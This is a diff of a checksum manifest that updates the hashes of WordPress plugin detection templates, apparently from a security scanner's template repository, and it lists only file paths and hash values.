-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c 